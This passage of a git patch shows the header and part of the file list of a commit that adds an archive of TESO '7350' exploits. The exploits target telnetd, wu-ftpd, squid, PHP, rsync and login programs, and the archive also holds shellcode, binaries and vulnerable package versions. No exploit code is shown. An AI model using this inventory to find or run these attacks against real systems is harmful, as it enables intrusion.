From c9cbeced5b3f2bdd7407e29c0811e65954132540 Mon Sep 17 00:00:00 2001 From: Root THC Date: Tue, 24 Feb 2026 12:42:47 +0000 Subject: initial --- exploits/7350854/7350854 | Bin 0 -> 18649 bytes exploits/7350854/7350854-r | Bin 0 -> 18712 bytes exploits/7350854/7350854-r.c | 944 +++++ exploits/7350854/7350854.c | 877 +++++ exploits/7350854/7350854.id0 | Bin 0 -> 196608 bytes exploits/7350854/7350854.id1 | Bin 0 -> 73728 bytes exploits/7350854/7350854.nam | Bin 0 -> 16384 bytes exploits/7350854/7350854.til | Bin 0 -> 64 bytes exploits/7350854/teso-advisory-011.tar.gz | Bin 0 -> 2510 bytes exploits/7350854/teso-advisory-011.txt | 307 ++ .../teso-advisory-011/teso-advisory-011.txt | 153 + exploits/7350854/teso-howitmaybeworkonsparc.txt | 59 + exploits/7350855-netkit/netkit-telnet-0.16/BUGS | 24 + .../7350855-netkit/netkit-telnet-0.16/ChangeLog | 152 + exploits/7350855-netkit/netkit-telnet-0.16/MCONFIG | 20 + .../7350855-netkit/netkit-telnet-0.16/MCONFIG.in | 30 + exploits/7350855-netkit/netkit-telnet-0.16/MRULES | 8 + .../7350855-netkit/netkit-telnet-0.16/Makefile | 20 + exploits/7350855-netkit/netkit-telnet-0.16/README | 102 + .../7350855-netkit/netkit-telnet-0.16/configure | 571 +++ .../netkit-telnet-0.16/debian/changelog | 139 + .../netkit-telnet-0.16/debian/control | 21 + .../netkit-telnet-0.16/debian/copyright | 18 + .../7350855-netkit/netkit-telnet-0.16/debian/dirs | 2 + .../7350855-netkit/netkit-telnet-0.16/debian/docs | 2 + .../netkit-telnet-0.16/debian/login.c | 23 + .../7350855-netkit/netkit-telnet-0.16/debian/rules | 77 + .../netkit-telnet-0.16/debian/telnetd.dirs | 4 + .../netkit-telnet-0.16/debian/telnetd.postinst | 45 + .../netkit-telnet-0.16/debian/telnetd.postrm | 29 + .../netkit-telnet-0.16/debian/telnetd.prerm | 9 + .../netkit-telnet-0.16/pty-hang.patch | 99 + .../netkit-telnet-0.16/telnet/Makefile | 30 + .../telnet/NetKit-B-0.06-telnet.patch | 27 + .../netkit-telnet-0.16/telnet/README | 26 + .../netkit-telnet-0.16/telnet/README.old | 566 +++ .../7350855-netkit/netkit-telnet-0.16/telnet/TODO | 13 + .../netkit-telnet-0.16/telnet/array.h | 97 + .../netkit-telnet-0.16/telnet/authenc.cc | 114 + .../netkit-telnet-0.16/telnet/commands.cc | 2233 +++++++++++ .../netkit-telnet-0.16/telnet/commands.o | Bin 0 -> 44868 bytes .../netkit-telnet-0.16/telnet/defines.h | 52 + .../netkit-telnet-0.16/telnet/depend.mk | 17 + .../netkit-telnet-0.16/telnet/environ.cc | 200 + .../netkit-telnet-0.16/telnet/environ.h | 10 + .../netkit-telnet-0.16/telnet/environ.o | Bin 0 -> 6120 bytes .../netkit-telnet-0.16/telnet/externs.h | 365 ++ .../netkit-telnet-0.16/telnet/fdset.h | 50 + .../netkit-telnet-0.16/telnet/general.h | 46 + .../netkit-telnet-0.16/telnet/genget.cc | 91 + .../netkit-telnet-0.16/telnet/genget.h | 5 + .../netkit-telnet-0.16/telnet/genget.o | Bin 0 -> 1324 bytes .../netkit-telnet-0.16/telnet/main.cc | 257 ++ .../netkit-telnet-0.16/telnet/main.o | Bin 0 -> 4460 bytes .../netkit-telnet-0.16/telnet/netlink.cc | 199 + .../netkit-telnet-0.16/telnet/netlink.h | 26 + .../netkit-telnet-0.16/telnet/netlink.o | Bin 0 -> 7068 bytes .../netkit-telnet-0.16/telnet/network.cc | 91 + .../netkit-telnet-0.16/telnet/network.o | Bin 0 -> 1744 bytes .../netkit-telnet-0.16/telnet/proto.h | 41 + .../netkit-telnet-0.16/telnet/ptrarray.h | 92 + .../netkit-telnet-0.16/telnet/ring.cc | 209 ++ .../netkit-telnet-0.16/telnet/ring.h | 111 + .../netkit-telnet-0.16/telnet/ring.o | Bin 0 -> 4984 bytes .../netkit-telnet-0.16/telnet/sys_bsd.cc | 406 ++ .../netkit-telnet-0.16/telnet/sys_bsd.o | Bin 0 -> 4284 bytes .../netkit-telnet-0.16/telnet/telnet | Bin 0 -> 123042 bytes .../netkit-telnet-0.16/telnet/telnet.1 | 1263 +++++++ .../netkit-telnet-0.16/telnet/telnet.cc | 2069 +++++++++++ .../netkit-telnet-0.16/telnet/telnet.o | Bin 0 -> 27488 bytes .../netkit-telnet-0.16/telnet/terminal.cc | 718 ++++ .../netkit-telnet-0.16/telnet/terminal.h | 11 + .../netkit-telnet-0.16/telnet/terminal.o | Bin 0 -> 9248 bytes .../netkit-telnet-0.16/telnet/tn3270.cc | 366 ++ .../netkit-telnet-0.16/telnet/tn3270.o | Bin 0 -> 829 bytes .../netkit-telnet-0.16/telnet/types.h | 52 + .../netkit-telnet-0.16/telnet/utilities.cc | 673 ++++ .../netkit-telnet-0.16/telnet/utilities.o | Bin 0 -> 13444 bytes .../netkit-telnet-0.16/telnetd/Makefile | 38 + .../netkit-telnet-0.16/telnetd/authenc.c | 83 + .../netkit-telnet-0.16/telnetd/defs.h | 215 ++ .../netkit-telnet-0.16/telnetd/ext.h | 212 ++ .../netkit-telnet-0.16/telnetd/getent.c | 71 + .../netkit-telnet-0.16/telnetd/global.c | 98 + .../netkit-telnet-0.16/telnetd/issue.net.5 | 43 + .../netkit-telnet-0.16/telnetd/login.3 | 107 + .../netkit-telnet-0.16/telnetd/logout.h | 1 + .../netkit-telnet-0.16/telnetd/logwtmp.h | 5 + .../netkit-telnet-0.16/telnetd/pathnames.h | 41 + .../netkit-telnet-0.16/telnetd/setproctitle.3 | 73 + .../netkit-telnet-0.16/telnetd/setproctitle.c | 145 + .../netkit-telnet-0.16/telnetd/setproctitle.h | 4 + .../netkit-telnet-0.16/telnetd/slc.c | 456 +++ .../netkit-telnet-0.16/telnetd/state.c | 1408 +++++++ .../netkit-telnet-0.16/telnetd/sys_term.c | 744 ++++ .../7350855-netkit/netkit-telnet-0.16/telnetd/t.c | 2 + .../netkit-telnet-0.16/telnetd/telnetd.8 | 486 +++ .../netkit-telnet-0.16/telnetd/telnetd.c | 1163 ++++++ .../netkit-telnet-0.16/telnetd/telnetd.h | 50 + .../netkit-telnet-0.16/telnetd/termstat.c | 588 +++ .../netkit-telnet-0.16/telnetd/utility.c | 1145 ++++++ .../7350855-netkit/netkit-telnet-0.16/version.h | 5 + exploits/7350855-netkit/netkit-telnet-0.17/BUGS | 24 + .../7350855-netkit/netkit-telnet-0.17/ChangeLog | 170 + .../7350855-netkit/netkit-telnet-0.17/MCONFIG.in | 30 + exploits/7350855-netkit/netkit-telnet-0.17/MRULES | 8 + .../7350855-netkit/netkit-telnet-0.17/Makefile | 20 + exploits/7350855-netkit/netkit-telnet-0.17/README | 127 + .../7350855-netkit/netkit-telnet-0.17/configure | 572 +++ .../netkit-telnet-0.17/debian/changelog | 244 ++ .../netkit-telnet-0.17/debian/control | 25 + .../netkit-telnet-0.17/debian/copyright | 18 + .../7350855-netkit/netkit-telnet-0.17/debian/dirs | 3 + .../7350855-netkit/netkit-telnet-0.17/debian/docs | 2 + .../7350855-netkit/netkit-telnet-0.17/debian/menu | 3 + .../netkit-telnet-0.17/debian/postinst | 8 + .../7350855-netkit/netkit-telnet-0.17/debian/prerm | 7 + .../7350855-netkit/netkit-telnet-0.17/debian/rules | 85 + .../netkit-telnet-0.17/debian/telnetd.dirs | 4 + .../netkit-telnet-0.17/debian/telnetd.docs | 2 + .../netkit-telnet-0.17/debian/telnetd.postinst | 57 + .../netkit-telnet-0.17/debian/telnetd.postrm | 25 + .../netkit-telnet-0.17/debian/telnetd.prerm | 6 + .../netkit-telnet-0.17/pty-hang.patch | 99 + .../netkit-telnet-0.17/telnet/Makefile | 30 + .../netkit-telnet-0.17/telnet/README | 26 + .../netkit-telnet-0.17/telnet/README.old | 566 +++ .../7350855-netkit/netkit-telnet-0.17/telnet/TODO | 13 + .../netkit-telnet-0.17/telnet/array.h | 97 + .../netkit-telnet-0.17/telnet/authenc.cc | 116 + .../netkit-telnet-0.17/telnet/commands.cc | 2262 ++++++++++++ .../netkit-telnet-0.17/telnet/defines.h | 52 + .../netkit-telnet-0.17/telnet/depend.mk | 17 + .../netkit-telnet-0.17/telnet/environ.cc | 201 + .../netkit-telnet-0.17/telnet/environ.h | 10 + .../netkit-telnet-0.17/telnet/externs.h | 365 ++ .../netkit-telnet-0.17/telnet/fdset.h | 50 + .../netkit-telnet-0.17/telnet/general.h | 46 + .../netkit-telnet-0.17/telnet/genget.cc | 91 + .../netkit-telnet-0.17/telnet/genget.h | 5 + .../netkit-telnet-0.17/telnet/main.cc | 275 ++ .../netkit-telnet-0.17/telnet/netlink.cc | 177 + .../netkit-telnet-0.17/telnet/netlink.h | 25 + .../netkit-telnet-0.17/telnet/network.cc | 92 + .../netkit-telnet-0.17/telnet/proto.h | 41 + .../netkit-telnet-0.17/telnet/ptrarray.h | 92 + .../netkit-telnet-0.17/telnet/ring.cc | 213 ++ .../netkit-telnet-0.17/telnet/ring.h | 111 + .../netkit-telnet-0.17/telnet/sys_bsd.cc | 413 +++ .../netkit-telnet-0.17/telnet/telnet.1 | 1267 +++++++ .../netkit-telnet-0.17/telnet/telnet.cc | 2071 +++++++++++ .../netkit-telnet-0.17/telnet/terminal.cc | 720 ++++ .../netkit-telnet-0.17/telnet/terminal.h | 11 + .../netkit-telnet-0.17/telnet/tn3270.cc | 366 ++ .../netkit-telnet-0.17/telnet/types.h | 52 + .../netkit-telnet-0.17/telnet/utilities.cc | 675 ++++ .../netkit-telnet-0.17/telnetd/Makefile | 38 + .../netkit-telnet-0.17/telnetd/authenc.c | 71 + .../netkit-telnet-0.17/telnetd/defs.h | 216 ++ .../netkit-telnet-0.17/telnetd/ext.h | 214 ++ .../netkit-telnet-0.17/telnetd/getent.c | 71 + .../netkit-telnet-0.17/telnetd/global.c | 97 + .../netkit-telnet-0.17/telnetd/issue.net.5 | 43 + .../netkit-telnet-0.17/telnetd/login.3 | 107 + .../netkit-telnet-0.17/telnetd/logout.h | 1 + .../netkit-telnet-0.17/telnetd/logwtmp.h | 5 + .../netkit-telnet-0.17/telnetd/pathnames.h | 41 + .../netkit-telnet-0.17/telnetd/setproctitle.3 | 73 + .../netkit-telnet-0.17/telnetd/setproctitle.c | 145 + .../netkit-telnet-0.17/telnetd/setproctitle.h | 4 + .../netkit-telnet-0.17/telnetd/slc.c | 456 +++ .../netkit-telnet-0.17/telnetd/state.c | 1407 +++++++ .../netkit-telnet-0.17/telnetd/sys_term.c | 744 ++++ .../netkit-telnet-0.17/telnetd/telnetd.8 | 486 +++ .../netkit-telnet-0.17/telnetd/telnetd.c | 1208 ++++++ .../netkit-telnet-0.17/telnetd/telnetd.h | 50 + .../netkit-telnet-0.17/telnetd/termstat.c | 588 +++ .../netkit-telnet-0.17/telnetd/utility.c | 1266 +++++++ .../netkit-telnet-0.17/telnetlogin/Makefile | 18 + .../netkit-telnet-0.17/telnetlogin/telnetlogin.8 | 91 + .../netkit-telnet-0.17/telnetlogin/telnetlogin.c | 230 ++ .../7350855-netkit/netkit-telnet-0.17/version.h | 5 + .../netkit-telnet_0.16-4potato.1.diff.gz | Bin 0 -> 8327 bytes .../netkit-telnet_0.16-4potato.1.dsc | 23 + .../7350855-netkit/netkit-telnet_0.16.orig.tar.gz | Bin 0 -> 130043 bytes .../7350855-netkit/netkit-telnet_0.17-14.diff.gz | Bin 0 -> 20569 bytes exploits/7350855-netkit/netkit-telnet_0.17-14.dsc | 24 + .../7350855-netkit/netkit-telnet_0.17.orig.tar.gz | Bin 0 -> 133749 bytes exploits/7350855-netkit/telnetd-0.16.tgz | Bin 0 -> 26640 bytes .../usr/lib/telnetd/login | Bin 0 -> 2988 bytes .../usr/share/doc/telnetd/changelog.Debian.gz | Bin 0 -> 1477 bytes .../usr/share/doc/telnetd/changelog.gz | Bin 0 -> 2550 bytes .../usr/share/doc/telnetd/copyright | 18 + .../usr/share/man/man5/issue.net.5.gz | Bin 0 -> 676 bytes .../usr/share/man/man8/in.telnetd.8.gz | Bin 0 -> 4700 bytes .../usr/share/man/man8/telnetd.8.gz | 1 + exploits/7350855-netkit/telnetd_0.16-4potato.1.deb | Bin 0 -> 29366 bytes exploits/7350855-netkit/telnetd_0.17-13_i386.deb | Bin 0 -> 37522 bytes exploits/7350855/0/7350somefoo.c | 292 ++ exploits/7350855/0/Makefile | 20 + exploits/7350855/0/README | 18 + exploits/7350855/0/common.c | 318 ++ exploits/7350855/0/common.h | 26 + exploits/7350855/0/network.c | 918 +++++ exploits/7350855/0/network.h | 367 ++ exploits/7350855/0/packet.c | 487 +++ exploits/7350855/0/packet.h | 85 + exploits/7350855/0/readtest.c | 42 + exploits/7350855/0/sniff.c | 323 ++ exploits/7350855/0/sniff.h | 44 + exploits/7350855/7350855 | Bin 0 -> 189293 bytes exploits/7350855/7350855-bumped.tar.gz | Bin 0 -> 23571 bytes exploits/7350855/7350855.c | 293 ++ exploits/7350855/7350855_exploit.c | 877 +++++ exploits/7350855/Makefile | 20 + exploits/7350855/common.c | 318 ++ exploits/7350855/common.h | 26 + exploits/7350855/common.o | Bin 0 -> 21684 bytes exploits/7350855/network.c | 918 +++++ exploits/7350855/network.h | 367 ++ exploits/7350855/network.o | Bin 0 -> 46048 bytes exploits/7350855/none.tgz | Bin 0 -> 18002 bytes exploits/7350855/packet.c | 487 +++ exploits/7350855/packet.h | 85 + exploits/7350855/packet.o | Bin 0 -> 44540 bytes exploits/7350855/readtest | Bin 0 -> 63363 bytes exploits/7350855/readtest.c | 42 + exploits/7350855/sniff.c | 323 ++ exploits/7350855/sniff.h | 44 + exploits/7350855/sniff.o | Bin 0 -> 41984 bytes exploits/7350aio/7350aio.c | 117 + exploits/7350bdf/7350bdf.c | 201 + exploits/7350hprlpd/7350hprlpd | Bin 0 -> 30064 bytes exploits/7350hprlpd/7350hprlpd.c | 345 ++ exploits/7350hpuke/7350hpuke | Bin 0 -> 24899 bytes exploits/7350hpuke/7350hpuke.c | 1270 +++++++ exploits/7350hpuke/backup/7350hpuke-0.2.0.c | 840 +++++ exploits/7350hpuke/backup/7350hpuke-0.2.1.c | 894 +++++ exploits/7350hpuke/backup/7350hpuke-0.4.0.c | 1214 ++++++ exploits/7350hpuke/proof/proof.txt | 2 + exploits/7350hpuke/proof/proof_hpux_ftpd.txt | 99 + exploits/7350logout/7350logout | Bin 0 -> 20426 bytes exploits/7350logout/7350logout-0.2.1.c | 954 +++++ exploits/7350logout/7350logout.c | 1189 ++++++ exploits/7350logout/irix-6.5-login.c | 3867 ++++++++++++++++++++ exploits/7350logout/login-27-x86 | Bin 0 -> 27996 bytes exploits/7350logout/login-ex.c-20020318-morgan | 533 +++ exploits/7350logout/loginex.c | 302 ++ exploits/7350logout/pam.txt | 103 + exploits/7350logout/solaris-2.4-sparc-login | Bin 0 -> 27260 bytes exploits/7350logout/solaris-2.6-sparc-login | Bin 0 -> 29444 bytes exploits/7350logout/solaris-2.6-sparc-login2 | Bin 0 -> 29512 bytes exploits/7350logout/solaris-2.7-login.c | 2355 ++++++++++++ exploits/7350logout/solaris-2.8-sparc-login | Bin 0 -> 29292 bytes .../7350logout/solaris-2.8-sparc-login-patched | Bin 0 -> 29200 bytes exploits/7350logout/solaris-2.8-sparc-login.o | Bin 0 -> 38604 bytes exploits/7350php/7350php | Bin 0 -> 21909 bytes exploits/7350php/7350php.c | 376 ++ exploits/7350php/Makefile | 17 + exploits/7350php/common.c | 318 ++ exploits/7350php/common.h | 26 + exploits/7350php/common.o | Bin 0 -> 2692 bytes exploits/7350php/network.c | 918 +++++ exploits/7350php/network.h | 367 ++ exploits/7350php/network.o | Bin 0 -> 8936 bytes exploits/7350rsync/7350rsync.c | 1256 +++++++ exploits/7350squish/7350squish | Bin 0 -> 12419 bytes exploits/7350squish/7350squish-0.1.tar.gz | Bin 0 -> 7345 bytes exploits/7350squish/7350squish.c | 642 ++++ exploits/7350squish/7350squish.txt | 94 + exploits/7350squish/deb/squid_2.3.4-2_i386.deb | Bin 0 -> 666056 bytes exploits/7350squish/deb/squid_2.4.1-1_i386.deb | Bin 0 -> 671672 bytes exploits/7350squish/deb/squid_2.4.1-2_i386.deb | Bin 0 -> 671734 bytes exploits/7350squish/deb/squid_2.4.1-3_i386.deb | Bin 0 -> 671786 bytes exploits/7350squish/deb/squid_2.4.1-4_i386.deb | Bin 0 -> 672908 bytes exploits/7350squish/deb/squid_2.4.1-5_i386.deb | Bin 0 -> 672822 bytes exploits/7350squish/deb/squid_2.4.2-1_i386.deb | Bin 0 -> 675904 bytes exploits/7350squish/offset-find.sh | 67 + exploits/7350squish/tagspace.c | 42 + exploits/7350squish/udp.c | 232 ++ exploits/7350wurm/7350wurm | Bin 0 -> 27684 bytes exploits/7350wurm/7350wurm-backup2.c | 1173 ++++++ exploits/7350wurm/7350wurm-backup3.c | 1235 +++++++ exploits/7350wurm/7350wurm-backup4.c | 1217 ++++++ exploits/7350wurm/7350wurm.c | 1428 ++++++++ exploits/7350wurm/backup/7350wurm-backup2.c | 1034 ++++++ exploits/7350wurm/backup/7350wurm-old.c | 925 +++++ exploits/7350wurm/doc/for-scut.txt | 48 + exploits/7350wurm/doc/free.txt | 77 + exploits/7350wurm/doc/syn.txt | 73 + exploits/7350wurm/doc/synnergy-method.txt | 16 + exploits/7350wurm/offset-find.sh | 57 + exploits/7350wurm/openbsd-ftpd-linux.txt | 7 + .../redhat50update_wu-ftpd-2.4.2b18-2.1.i386.rpm | Bin 0 -> 119573 bytes .../redhat51update_wu-ftpd-2.4.2b18-2.1.i386.rpm | Bin 0 -> 119573 bytes .../rpm/done/redhat52_wu-ftpd-2.4.2b18-2.i386.rpm | Bin 0 -> 120648 bytes .../redhat52update_wu-ftpd-2.6.0-2.5.x.i386.rpm | Bin 0 -> 173351 bytes .../redhat60update_wu-ftpd-2.6.0-14.6x.i386.rpm | Bin 0 -> 195637 bytes .../redhat61update_wu-ftpd-2.6.0-14.6x.i386.rpm | Bin 0 -> 195637 bytes .../rpm/done/redhat62_wu-ftpd-2.6.0-3.i386.rpm | Bin 0 -> 189643 bytes .../redhat62update_wu-ftpd-2.6.0-14.6x.i386.rpm | Bin 0 -> 195637 bytes .../rpm/done/redhat70_wu-ftpd-2.6.1-6.i386.rpm | Bin 0 -> 196336 bytes .../rpm/done/redhat71_wu-ftpd-2.6.1-16.i386.rpm | Bin 0 -> 220928 bytes .../rpm/done/redhat72_wu-ftpd-2.6.1-18.i386.rpm | Bin 0 -> 219324 bytes .../done/suse6061update_wuftpd-2.6.0-151.i386.rpm | Bin 0 -> 332291 bytes .../done/suse62update_wuftpd-2.6.0-121.i386.rpm | Bin 0 -> 339308 bytes .../7350wurm/rpm/done/suse70default_wuftpd.rpm | Bin 0 -> 332428 bytes .../7350wurm/rpm/done/suse71default_wuftpd.rpm | Bin 0 -> 329378 bytes .../7350wurm/rpm/done/suse72default_wuftpd.rpm | Bin 0 -> 334720 bytes .../7350wurm/rpm/done/suse73default_wuftpd.rpm | Bin 0 -> 333844 bytes exploits/7350wurm/rpm/failed/suse-53.de-wuftpd.rpm | Bin 0 -> 80547 bytes .../immunix62_wu-ftpd-2.6.0-3_StackGuard.i386.rpm | Bin 0 -> 195809 bytes .../redhat62update_wu-ftpd-2.6.1-0.6x.21.i386.rpm | Bin 0 -> 216611 bytes .../redhat70update_wu-ftpd-2.6.1-16.7x.1.i386.rpm | Bin 0 -> 220217 bytes .../redhat71update_wu-ftpd-2.6.1-16.7x.1.i386.rpm | Bin 0 -> 220217 bytes .../redhat72update_wu-ftpd-2.6.1-20.i386.rpm | Bin 0 -> 219510 bytes .../patched/suse63update_wuftpd-2.6.0-347.i386.rpm | Bin 0 -> 341014 bytes .../patched/suse64update_wuftpd-2.6.0-344.i386.rpm | Bin 0 -> 336858 bytes .../patched/suse70update_wuftpd-2.6.0-344.i386.rpm | Bin 0 -> 333415 bytes .../patched/suse71update_wuftpd-2.6.0-346.i386.rpm | Bin 0 -> 330753 bytes .../patched/suse72update_wuftpd-2.6.0-344.i386.rpm | Bin 0 -> 335916 bytes .../patched/suse73update_wuftpd-2.6.0-344.i386.rpm | Bin 0 -> 343373 bytes .../rpm/redhat60_wu-ftpd-2.4.2vr17-3.i386.rpm | Bin 0 -> 160584 bytes .../7350wurm/rpm/redhat61_wu-ftpd-2.5.0-9.i386.rpm | Bin 0 -> 172156 bytes exploits/7350wurm/rpm/wu-ftpd-2.6.0.tgz | Bin 0 -> 185897 bytes exploits/7350wurm/rpm/wu-ftpd-2.6.0/etc/ftpaccess | 24 + .../7350wurm/rpm/wu-ftpd-2.6.0/etc/ftpconversions | 7 + exploits/7350wurm/rpm/wu-ftpd-2.6.0/etc/ftpgroups | 1 + exploits/7350wurm/rpm/wu-ftpd-2.6.0/etc/ftphosts | 5 + exploits/7350wurm/rpm/wu-ftpd-2.6.0/etc/ftpusers | 14 + .../rpm/wu-ftpd-2.6.0/etc/logrotate.d/ftpd | 4 + exploits/7350wurm/rpm/wu-ftpd-2.6.0/etc/pam.d/ftp | 6 + .../7350wurm/rpm/wu-ftpd-2.6.0/usr/bin/ftpcount | Bin 0 -> 10188 bytes exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/bin/ftpwho | Bin 0 -> 10188 bytes .../wu-ftpd-2.6.0/usr/doc/wu-ftpd-2.6.0/CHANGES | 2865 +++++++++++++++ .../usr/doc/wu-ftpd-2.6.0/CONTRIBUTORS | 344 ++ .../rpm/wu-ftpd-2.6.0/usr/doc/wu-ftpd-2.6.0/ERRATA | 68 + .../doc/wu-ftpd-2.6.0/HOWTO/VIRTUAL.FTP.SUPPORT | 722 ++++ .../wu-ftpd-2.6.0/HOWTO/upload.configuration.HOWTO | 463 +++ .../rpm/wu-ftpd-2.6.0/usr/doc/wu-ftpd-2.6.0/README | 76 + .../rpm/wu-ftpd-2.6.0/usr/doc/wu-ftpd-2.6.0/TODO | 105 + .../usr/doc/wu-ftpd-2.6.0/examples/ftpaccess | 19 + .../usr/doc/wu-ftpd-2.6.0/examples/ftpaccess.heavy | 59 + .../usr/doc/wu-ftpd-2.6.0/examples/ftpconversions | 9 + .../wu-ftpd-2.6.0/examples/ftpconversions.solaris | 2 + .../usr/doc/wu-ftpd-2.6.0/examples/ftpgroups | 1 + .../usr/doc/wu-ftpd-2.6.0/examples/ftphosts | 7 + .../usr/doc/wu-ftpd-2.6.0/examples/ftpservers | 25 + .../usr/doc/wu-ftpd-2.6.0/examples/ftpusers | 14 + .../rpm/wu-ftpd-2.6.0/usr/man/man1/ftpcount.1.gz | Bin 0 -> 701 bytes .../rpm/wu-ftpd-2.6.0/usr/man/man1/ftpwho.1.gz | Bin 0 -> 702 bytes .../rpm/wu-ftpd-2.6.0/usr/man/man5/ftpaccess.5.gz | Bin 0 -> 13641 bytes .../wu-ftpd-2.6.0/usr/man/man5/ftpconversions.5.gz | Bin 0 -> 857 bytes .../rpm/wu-ftpd-2.6.0/usr/man/man5/ftphosts.5.gz | Bin 0 -> 815 bytes .../rpm/wu-ftpd-2.6.0/usr/man/man5/ftpservers.5.gz | Bin 0 -> 1635 bytes .../rpm/wu-ftpd-2.6.0/usr/man/man5/xferlog.5.gz | Bin 0 -> 1490 bytes .../rpm/wu-ftpd-2.6.0/usr/man/man8/ftpd.8.gz | Bin 0 -> 5272 bytes .../rpm/wu-ftpd-2.6.0/usr/man/man8/ftprestart.8.gz | Bin 0 -> 846 bytes .../rpm/wu-ftpd-2.6.0/usr/man/man8/ftpshut.8.gz | Bin 0 -> 1583 bytes .../rpm/wu-ftpd-2.6.0/usr/man/man8/privatepw.8.gz | Bin 0 -> 1350 bytes .../7350wurm/rpm/wu-ftpd-2.6.0/usr/sbin/ckconfig | Bin 0 -> 8912 bytes .../7350wurm/rpm/wu-ftpd-2.6.0/usr/sbin/ftprestart | Bin 0 -> 9296 bytes .../7350wurm/rpm/wu-ftpd-2.6.0/usr/sbin/ftpshut | Bin 0 -> 12048 bytes .../7350wurm/rpm/wu-ftpd-2.6.0/usr/sbin/in.ftpd | Bin 0 -> 166352 bytes .../7350wurm/rpm/wu-ftpd-2.6.0/usr/sbin/in.wuftpd | 1 + .../7350wurm/rpm/wu-ftpd-2.6.0/usr/sbin/privatepw | Bin 0 -> 11888 bytes .../7350wurm/rpm/wu-ftpd-2.6.0/usr/sbin/wu.ftpd | 1 + .../7350wurm/rpm/wu-ftpd-2.6.0/usr/sbin/xferstats | 338 ++ exploits/7350wurm/shellcode/bambam.s | 230 ++ exploits/7350wurm/shellcode/codedump | Bin 0 -> 6555 bytes exploits/7350wurm/shellcode/codedump.c | 93 + exploits/7350wurm/shellcode/pt/Makefile | 8 + exploits/7350wurm/shellcode/pt/README | 6 + exploits/7350wurm/shellcode/pt/rptrace.c | 42 + exploits/7350wurm/shellcode/pt/rptrace.o | Bin 0 -> 1456 bytes exploits/7350wurm/shellcode/pt/x.tar.gz | Bin 0 -> 800 bytes exploits/7350wurm/shellcode/ptrace/ptrace-legit | Bin 0 -> 7622 bytes exploits/7350wurm/shellcode/ptrace/ptrace-legit.c | 192 + exploits/7350wurm/shellcode/t | Bin 0 -> 4994 bytes exploits/7350wurm/shellcode/t.c | 12 + exploits/7350wurm/shellcode/write-read-exec.s | 38 + exploits/7350wurm/timoglaser.txt | 3 + exploits/ftpd_exp/README | 5 + exploits/ftpd_exp/exp.c | 25 + exploits/ftpd_exp/exp.py | 26 + exploits/ifafoffuffoffaf.c | 1391 +++++++ 386 files changed, 81193 insertions(+) create mode 100644 exploits/7350854/7350854 create mode 100644 exploits/7350854/7350854-r create mode 100644 exploits/7350854/7350854-r.c create mode 100644 exploits/7350854/7350854.c create mode 100644 exploits/7350854/7350854.id0 create mode 100644 exploits/7350854/7350854.id1 create mode 100644 exploits/7350854/7350854.nam create mode 100644 exploits/7350854/7350854.til create mode 100644 exploits/7350854/teso-advisory-011.tar.gz create mode 100644 exploits/7350854/teso-advisory-011.txt create mode 100644 exploits/7350854/teso-advisory-011/teso-advisory-011.txt create mode 100644 exploits/7350854/teso-howitmaybeworkonsparc.txt create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/BUGS create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/ChangeLog create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/MCONFIG create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/MCONFIG.in create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/MRULES create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/Makefile create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/README create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/configure create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/debian/changelog create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/debian/control create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/debian/copyright create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/debian/dirs create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/debian/docs create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/debian/login.c create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/debian/rules create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/debian/telnetd.dirs create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/debian/telnetd.postinst create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/debian/telnetd.postrm create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/debian/telnetd.prerm create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/pty-hang.patch create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnet/Makefile create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnet/NetKit-B-0.06-telnet.patch create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnet/README create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnet/README.old create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnet/TODO create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnet/array.h create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnet/authenc.cc create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnet/commands.cc create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnet/commands.o create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnet/defines.h create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnet/depend.mk create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnet/environ.cc create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnet/environ.h create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnet/environ.o create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnet/externs.h create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnet/fdset.h create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnet/general.h create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnet/genget.cc create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnet/genget.h create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnet/genget.o create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnet/main.cc create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnet/main.o create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnet/netlink.cc create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnet/netlink.h create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnet/netlink.o create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnet/network.cc create mode 100644 exploits/7350855-netkit/netkit-telnet-0.16/telnet/network.o create 